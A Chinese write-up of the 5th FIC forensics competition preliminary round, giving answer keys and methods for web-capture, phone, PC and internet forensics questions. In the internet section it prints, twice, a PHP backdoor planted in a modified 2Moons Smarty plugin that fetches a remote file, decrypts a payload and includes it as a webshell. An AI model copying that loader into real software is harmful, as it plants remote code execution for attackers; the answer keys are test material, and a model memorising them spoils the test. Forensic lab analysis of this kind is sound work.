第五届FIC-初赛WP

admin 2025年5月26日13:51:55评论36 views字数 10088阅读33分37秒阅读模式

容器密码:3x@9Qm!V8e$vL%6d^Yr5o*C#Nk7h&ZpFbW2sG4jXuD1cO0lTgAqHwRnIzJyM-_+K=

第一部分网页快照

  1. 请分析检材一,该取证录像文件的 SHA256 值为

2753da22fe23cadaadc14fe4c1d5096a153360d9f91097ea376846431f5c1567

2. 请分析检材一,远程取证所使用的 OBS 工具版本号为

参考答案:2.29.1.3

第五届FIC-初赛WP

3. 请分析检材一,该检材所使用的远程取证的工具名称为

参考答案:A

第五届FIC-初赛WP

4. 请分析检材一,在该检材中,远程取证过程中校验的北京时间为

参考答案:D

第五届FIC-初赛WP

5. 请分析检材一,远程取证的网站 IP 地址为

参考答案:172.16.10.200

第五届FIC-初赛WP

6. 请分析检材一,在该检材中,远程取证的网站密码为

参考答案:admin123

第五届FIC-初赛WP

7. 请分析检材一,在已固定的订单列表中发现有一页缺失。请找出缺失页面的具体页码为

参考答案:12

输入所有页码去重排序,发现是12页

第五届FIC-初赛WP

8. 请分析检材一,补充订单列表中缺失页面的数据后,统计订单的总数为

参考答案:4000

第五届FIC-初赛WP

9. 请分析检材一,补充订单列表中缺失页面的数据后,统计已完成订单中老李监控批发的订单数为

建表求和后为238

第五届FIC-初赛WP

10. 请分析检材一,补充订单列表中缺失页面的数据后,统计已完成订单中老李监控批发ZK-101产品的订单数为

建表求和得67

第五届FIC-初赛WP

11. 请分析检材一,补充订单列表中缺失页面的数据后,统计已完成订单中老李监控批发产品在上海区域的订单数为

参考答案:12。统计后excel求和

第五届FIC-初赛WP

12. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的销售情况,并计算“赵磊(13967346658)”优惠后的总金额为(例如,优惠率为10%时按原单价的90%计算)

参考答案:4390。统计不同页码的订单单价及折扣求和。

第五届FIC-初赛WP

13. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计代理人的最大层级数为(其中顶级代理的用户定义为第1层)

参考答案:6

层级分析题,跑代码(万能代码)

第五届FIC-初赛WP
import pandas as pddef build_supervisor_dict(df):    supervisor_dict = {}    for index, row in df.iterrows():        name = row['姓名']        supervisor = row['上级']        if name not in supervisor_dict:            supervisor_dict[name] = supervisor    return supervisor_dictdef find_all_supervisors(name, supervisor_dict):    supervisors = [name]    while name in supervisor_dict:        name = supervisor_dict[name]        supervisors.insert(0, name)    return supervisorsdf = pd.read_excel('data.xlsx', sheet_name='hz_user', dtype=str)supervisor_dict = build_supervisor_dict(df)result_data = []for name in df['姓名']:    supervisors = find_all_supervisors(name, supervisor_dict)    result_data.append([name] + supervisors)max_length = max(len(row) for row in result_data)result_data = [row + [''] * (max_length - len(row)) for row in result_data]result_df = pd.DataFrame(result_data, columns=['姓名'] + [f'分级{i}' for i in range(1, max_length)])result_df.to_excel('result.xlsx', index=False)

14. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计每位代理的直接下游人数,并确定直接下游人数排名第一的代理人为

参考答案:杨伟娜

第五届FIC-初赛WP
第五届FIC-初赛WP

15. 请分析检材一,补充“代理列表”中缺失页面的数据后,根据地址信息统计各区域的代理人数,并确定上海区域的代理人数为

参考答案:5。赵磊、朱洋、周强、黄伟娟、刘平伟。

第五届FIC-初赛WP

第二部分手机取证

1. 请分析检材二,请分析"手机"检材,并回答,并回答该手机的device_name是?

参考答案:Redmi 6 Pro

先通过AI确定大致存储位置为“system”分区中,然后逐个扫描,放到百度搜索就可以了(考试时候填的红米6Pro可惜了)

第五届FIC-初赛WP
第五届FIC-初赛WP

2. 请分析检材二,请分析"手机"检材,并回答,嫌疑人pc开机密码是什么?

参考答案:1qaz2wsx

通过软件解析发现便签中记录电脑开机密码为1列2列,所以有意识的去看便签数据库,找到目标内容并且拿1列2列密码是碰一下计算机检材就可以了

第五届FIC-初赛WP
第五届FIC-初赛WP

3. 请分析检材二,请分析"手机"检材,并回答,嫌疑人接头暗号是什么?

参考答案:爱能不能够永远单纯没有悲哀

将tar包按照大小排序,发现可以包名“com.bijoysingh.yang”,分析数据库定位到目标附件,然后全局搜索一下即可

第五届FIC-初赛WP
第五届FIC-初赛WP
第五届FIC-初赛WP

4. 请分析检材二,请分析"手机"检材,并回答,嫌疑人存放的秘钥环是多少?

参考答案:1qaz2wsx3edc

第五届FIC-初赛WP

5. 请分析检材二,请分析"手机"检材,并回答,嫌疑人一生中最重要的日子是什么时候?

参考答案:2026-02-26(考试卡了好久,最后全局搜索找到图片)

第五届FIC-初赛WP

6. 请分析检材三,请分析"手机"检材,并回答,嫌疑人微信生成的聊天记录数据库文件名称是什么?

参考答案:EnMicroMsg.db

这个没啥解释了,之前有写过文章大家想看安卓微信数据库解密爬楼就可以了

第五届FIC-初赛WP

7. 请分析检材二,请分析"手机"检材,并回答,嫌疑人微信账号对应的 UIN 为多少?

参考答案:1864810197

不解析啦,大家看之前公众号吧

8. 请分析检材二,请分析"手机"检材,并回答,嫌疑人微信聊天记录数据库的加密秘钥是什么?

参考答案:290f678

不解析啦,大家看之前公众号吧

9. 请分析检材二,请分析"手机"检材,并回答,嫌疑人“欠条.rar”的解压密码是多少?

参考答案:3170010703

把微信聊天发的图片导出来调整曝光找到二维码扫码得到密码

第五届FIC-初赛WP

10. 请分析检材二,请分析"手机"检材,并回答,嫌疑人“欠条.rar”解压后,其中VeraCrypt容器MD5值是多少?

参考答案:83da62aabc88cb1b23e9469142b67b80

11. 请分析检材二,请分析"手机"检材,并回答,嫌疑人提供的“欠条.rar”解压后,其中"1.png"图上显示的VeraCrypt容器密码是多少?

参考答案:#!@KE2sax@!da0h5hghg34&@

使用神器解隐写

第五届FIC-初赛WP

12. 请分析检材二,请分析"手机"检材,并回答,嫌疑人李某全名是什么?

参考答案:李安弘

VeraCrypt加载看欠条

第五届FIC-初赛WP

13. 请分析检材二,请分析"手机"检材,并回答,嫌疑人欠款金额是多少?

参考答案:80000

同上题从欠条里找到

第三部分介质取证

1. 请分析检材三,请分析"电脑"检材,并回答,该电脑最后一次开机时间是?

参考答案:C、2025/4/14 11:49:47

第五届FIC-初赛WP

2. 请分析检材三,请分析"电脑"检材,并回答,嫌疑人的备用机号码是多少?

参考答案:18877332134

仿真起来看便签

第五届FIC-初赛WP

3. 请分析检材三,请分析"电脑"检材,并回答,域名dgy02.com曾保存过一个密码,该密码是多少?

参考答案:123456

这题考察的浏览器保存的密码相关知识,密码是跟开机密码关联的,所以仿真的时候不能去清除密码,要用原密码进入,首先找到密钥环

第五届FIC-初赛WP

然后仿真直接输入密钥环在密码里面可以看到

第五届FIC-初赛WP

4. 请分析检材三,请分析"电脑"检材,并回答,其电脑安装的微信版本是多少?

参考答案:4.0.0.21

第五届FIC-初赛WP

5. 请分析检材三,请分析"电脑"检材,并回答,该系统有哪些远程控制软件

拿着答案去搜索

第五届FIC-初赛WP
第五届FIC-初赛WP

6. 请分析检材三,请分析"电脑"检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,其记录的日志文件名为

参考答案:sunlogin_service.log.2

XWAY/var/log

第五届FIC-初赛WP
第五届FIC-初赛WP
第五届FIC-初赛WP

直接根据日志里面的时间格式搜索

第五届FIC-初赛WP

只有在sunlogin_service.log.2里面有

7. 请分析检材三,请分析"电脑"检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,日志内记录对方公网IP地址和端口为

参考答案:116.192.161.222:2577

直接把日志文件丢AI分析

第五届FIC-初赛WP

8. 请分析检材三,请分析"电脑"检材,并回答,某文件的MD5值为“2bdfcdbd6c63efc094ac154a28968b7d”,该文件名为

参考答案:important.docx

第五届FIC-初赛WP

浏览+递归然后计算分区六的哈希,分区4的哈希也算过但是算完之后过滤没有所以又算了分区六的

第五届FIC-初赛WP

MD5过滤出来

第五届FIC-初赛WP

9. 请分析检材三,请分析"电脑"检材,据调查,上述文件存放了钱包助记词,第一个单词是什么?

参考答案:solution

根据题干知道这题答案在important.docx中,直接把这个文档当做压缩包解压,然后扫描文件隐写即可

第五届FIC-初赛WP

10. 请分析检材三(“我的测试机”),最近曾访问过的音频文件,该音频文件的文件名是什么

参考答案:自传小说.mp3

第五届FIC-初赛WP

11. 请分析检材三(“我的测试机”),最近曾使用过USB设备,该设备的名称为

参考答案:ThinkPLus

第五届FIC-初赛WP

12. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人现任妻子毕业的大学是?

参考答案:北京大学

使用科大讯飞会员将音频转为文字内容,分析即可

第五届FIC-初赛WP

13. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人是通过一个朋友认识的陈老板,该朋友姓氏拼音是?

参考答案:wang

第五届FIC-初赛WP

14. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人所说的香格里拉大酒店实则是?

参考答案:棋牌室

第五届FIC-初赛WP

15. 请分析检材三(我的测试机)中的音频内容,并回答,嫌疑人银行密码是多少?

参考答案:071492

考试没搞定,每段话的第一个字连起来,真6

第四部分互联网取证

1. 请分析检材二,找到李某上游人员陈某博客宣传所用域名为

参考答案:chen.foren6

第五届FIC-初赛WP

2. 请分析陈某宣传所用域名,该域名的顶级域名在以下那个区块链注册

参考答案:B.HNS(https://handshake.org/)

第五届FIC-初赛WP

3. 请分析陈某宣传所用域名的顶级域名的域名解析服务器(DNS)共有几个

参考答案:2

第五届FIC-初赛WP

去https://www.namebase.io/网站搜索foren6

第五届FIC-初赛WP

4. 请分析陈某宣传所用域名的顶级域名的NS1服务器ip

参考答案:45.79.133.98

继续在namebase搜索varo

第五届FIC-初赛WP

5. 请分析陈某宣传所用域名,该域名DNS记录指向邮件服务器域名为

参考答案:mail.163.com

已知ns1.varo.(实际为 ns1.varo.domains,IP:45.79.133.98)是 ** .foren6** 的权威服务器,

可以直接使用dig命令向其查询chen.foren6的DNS记录

dig @45.79.133.98 chen.foren6 ANY

第五届FIC-初赛WP

图上可见邮件服务器域名为mail.163.com

6. 请分析陈某宣传所用域名,该域名的txt记录中chen的值为

参考答案:fengbaoliejiu

同上

7. 请分析陈某宣传所用域名,该域名DNS记录没有以下哪个域名

参考答案:D.hl.chen.foren6

题目给出的选项都没有出现在上述截图中,考虑这些子域名有独立的 DNS 记录(例如,admin.chen.foren6 有自己的 A 记录),由 chen.foren6 的 NS 服务器(ns1.varo.domains)管理。直接向NS1服务器查询子域名的记录

for sub in admin caidan fic hl; do

  dig @45.79.133.98 $sub.chen.foren6 ANY

done

root:~# for sub in admin caidan fic hl; do  dig @45.79.133.98 $sub.chen.foren6 ANYdone; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 admin.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50076;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;admin.chen.foren6.        IN    ANY;; ANSWER SECTION:admin.chen.foren6.    20    IN    MX    0 114.51.41.91.;; Query time: 231 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:24 UTC 2025;; MSG SIZE  rcvd: 74; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 caidan.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33278;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;caidan.chen.foren6.        IN    ANY;; ANSWER SECTION:caidan.chen.foren6.    20    IN    A    20.25.4.26;; Query time: 235 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:24 UTC 2025;; MSG SIZE  rcvd: 63; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 fic.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12576;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;fic.chen.foren6.        IN    ANY;; ANSWER SECTION:fic.chen.foren6.    20    IN    AAAA    fb00:9a9a:7d01:ddca:6666:6666::;; Query time: 215 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:25 UTC 2025;; MSG SIZE  rcvd: 72; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 hl.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34484;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;hl.chen.foren6.            IN    ANY;; AUTHORITY SECTION:chen.foren6.        20    IN    SOA    ns1.varo. ops.varo.domains. 1 10800 3600 604800 3600;; Query time: 239 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:25 UTC 2025;; MSG SIZE  rcvd: 103

把结果拿去问AI,给出结论

  • admin.chen.foren6
    :有 MX 记录(114.51.41.91,可能配置错误)。
  • caidan.chen.foren6
    :有 A 记录(20.25.4.26,正常)。
  • fic.chen.foren6
    :有 AAAA 记录(fb00:9a9a:7d01:ddca:6666:6666::,可能是测试)。
  • hl.chen.foren6
    :无记录(NXDOMAIN)。

因此选D

8. 请分析陈某宣传所用域名,该博客域名最终DNS解析指向的github仓库名为

参考答案:chewhaoN.github.io

通过dig找不到相关信息。直接从github上入手,搜索chen.foren6,找到了github仓库名

第五届FIC-初赛WP

9. 请分析陈某github账号,陈某对jkroepke/2Moons项目增改了几个文件

通过陈某github账号找到了2Moons项目,和jkroepke/2Moons原始项目分别下载下来进行对比

用vscode的插件Diff Folders对比两个文件夹,得到结果是192

第五届FIC-初赛WP

但是实际查看这些文件发现似乎只有换行符的区别,使用diff命令查看

# diff -r --exclude=.git --strip-trailing-cr --ignore-space-change --ignore-blank-lines 2Moons 2Moons-ori只在 2Moons 存在:encrypted.bindiff -r '--exclude=.git' --strip-trailing-cr --ignore-space-change --ignore-blank-lines 2Moons/includes/libs/Smarty/plugins/block.textformat.php 2Moons-ori/includes/libs/Smarty/plugins/block.textformat.php36,37c36<    function smarty_block_textformat($params, $content, $template, &$repeat)---> function smarty_block_textformat($params, $content, $template, &$repeat)113,114d111<     $a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?phpn".$i);include $k;unlink($k);yijuhua();

这么看只有2个文件不同,新增1个文件,修改1个文件。

10. 请分析陈某github账号,陈某在修改2Moons过程中提到了什么锅底

参考答案:蜂蜜锅底

查看被修改过的文件,发现新增了一个encrypted.bin文件,

第五届FIC-初赛WP

在修改文件中找到一个php文件

第五届FIC-初赛WP

查看该php文件找到后门

第五届FIC-初赛WP

可以发现访问了一个链接

解码该url得到答案

第五届FIC-初赛WP

11. 请分析陈某github账号,陈某在游戏2Moons中放置的后门连接码的密码为

根据后门内容,写出解密脚本,得到密码为ficnb

    $a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?phpn".$i);include $k;unlink($k);yijuhua();

访问css文件链接发现还存在,encrypted.bin文件也存在根目录下。让AI根据后门写一个解密脚本,解密encrypt文件内容。

wget --no-check-certificate https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css

第五届FIC-初赛WP
第五届FIC-初赛WP

12. 请访问陈某当前博客,陈某课程的扫码报名地址的域名为

参考答案:fic.forensix.cn

将陈某github上的源码下载下来,打开index.html,可以看到如下内容

第五届FIC-初赛WP

进入images路径下打开image1.png并扫码

第五届FIC-初赛WP

13. 请分析陈某当前博客,通过互联网找到陈某的旧博客网站标题为

参考答案:柳如烟大战霸天虎

分析当前博客的源码,从index.html中找到老博客的地址

第五届FIC-初赛WP

http://forensix2025.work.gd/

该地址目前已经无法访问,尝试查看快照文件,从https://archive.org/中搜寻该地址

第五届FIC-初赛WP

可以看到4.7和4.26均存在快照,但是4.26的快照为403

第五届FIC-初赛WP

4.7的快照存在博客内容

第五届FIC-初赛WP

可以看到博客网站标题为

第五届FIC-初赛WP

14. 请分析陈某旧博客,陈某的姓名为

参考答案:陈浩北

第五届FIC-初赛WP

15. 请分析陈某旧博客,陈某的邮箱地址为

参考答案:[email protected]

查看快照源码

第五届FIC-初赛WP

16. 请分析陈某旧博客,陈某的11位手机号为

参考答案:13170010703

第五届FIC-初赛WP

17. 请分析陈某旧博客,陈某最爱的dota英雄为

参考答案:D

老dotaer都懂的

第五届FIC-初赛WP

原文始发于微信公众号(取证与溯源):第五届FIC-初赛WP

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月26日13:51:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   第五届FIC-初赛WPhttps://cn-sec.com/archives/4017806.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息